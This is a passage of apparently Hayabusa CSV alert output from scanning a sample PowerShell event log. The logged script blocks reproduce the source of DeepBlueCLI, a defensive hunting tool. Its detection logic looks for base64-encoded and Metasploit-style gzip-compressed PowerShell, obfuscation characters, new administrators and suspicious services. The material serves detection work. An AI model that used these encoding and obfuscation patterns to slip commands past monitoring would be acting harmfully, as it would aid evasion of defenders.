-ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.024 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.029 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.032 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.017 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.017 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.018 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.019 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.046 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.048 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.049 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:19.155 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.122 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf 